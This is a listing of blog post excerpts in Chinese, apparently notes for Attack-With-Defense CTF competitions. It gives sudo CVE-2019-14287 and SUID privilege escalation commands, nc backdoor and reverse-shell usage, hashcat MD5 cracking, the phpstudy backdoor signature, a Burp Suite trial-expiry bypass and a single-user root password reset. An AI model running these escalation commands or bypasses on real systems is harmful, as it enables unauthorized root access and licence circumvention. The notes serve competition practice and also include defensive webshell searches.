AWD
AWD比赛中的技巧
1stPeak
天行健,君子以自强不息;地势坤,君子以厚德载物。
展开
-
nc——制作后门连接与反弹shell连接的使用
一、nc参数-g<网关> 设置路由器跃程通信网关,最多可设置8个-G<指向器数目> 设置来源路由指向器,其数值为4的倍数-h 在线帮助-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口-l 使用监听模式,管控传入的资料-n 直接使用IP地址,而不通过域名服务器。-o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒...原创 2020-04-18 22:48:52 · 3600 阅读 · 0 评论 -
Linux提权:常用三种方法
一、sudo提权(CVE-2019-14287)#以root身份执行命令:sudo -u#-1 idsudo -u#4294967259 cat /flag#以root身份登录:sudo -u#-1 /bin/bashsudo -u#4294967259 /bin/bash二、SUID提权获取root权限find / -perm -u=s -type f 2>/dev/...原创 2020-04-17 20:55:02 · 6521 阅读 · 0 评论 -
常用查杀端口命令
Linux1、netstat(1)常用参数简介-a或–all 显示所有连线中的Socket-n或–numeric 直接使用IP地址,而不通过域名服务器-p或–programs 显示正在使用Socket的程序识别码和程序名称-l或–listening 显示监控中的服务器的Socket-t或–tcp 显示TCP传输协议的连线状况-u或–udp 显示UDP传输协议的连线状况(2)常...原创 2020-04-16 18:31:28 · 1400 阅读 · 1 评论 -
hashcat离线碰撞md5
hashcat --force -a 0 -m 0 1.txt -o result.txt /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt碰撞结果在result.txt中(或/root/.hashcat/hashcat.potfile中)/usr/share/wordlists/metasploit/...原创 2020-04-15 20:25:38 · 2559 阅读 · 0 评论 -
Linux与Windows文件查找命令
Linux查询文件名:find / -name xx查找有无一句话木马:grep -rn 'eval(' 路径grep -rn --include=*.php 'eval(' 路径Windows查找文件名,windows类似linux中find的命令:for /rfor /r C: %i in (*) do @echo %i找出C盘下的所有文件,并将所有文件名都输出出来注...原创 2020-04-05 23:13:37 · 302 阅读 · 0 评论 -
phpstudy后门漏洞复现
笔记前言如果服务器是用phpstudy2016或phpstudy2018搭建的,那么就有可能存在后门发现漏洞后门代码在phpStudy2016和phpStudy2018的php-5.2.17或php-5.4.45的\ext\php_xmlrpc.dll文件中只要该文件中可以搜索到@eval(%s(‘%s’)),即证明漏洞存在phpStudy2016路径php\php-5.2.17...原创 2020-03-31 17:56:44 · 1466 阅读 · 1 评论 -
burpsuite临时过期解决办法
修改windows系统时间原创 2020-02-15 23:02:58 · 1331 阅读 · 0 评论 -
Ubuntu单用户修改root密码
Ubuntu单用户修改root密码(1)开机出现如下画面,选择高级选项,回车注:如果未出现这个界面,那么在刚开机,就一直按shift(2)之后选择recovery mode,按e编辑启动项(3)在启动项中找到ro recovery nomodest(4)将ro recovery nomodest修改为rw single init=/bin/bash,之后按ctrl+x,F10有时会...原创 2020-01-15 14:47:10 · 746 阅读 · 0 评论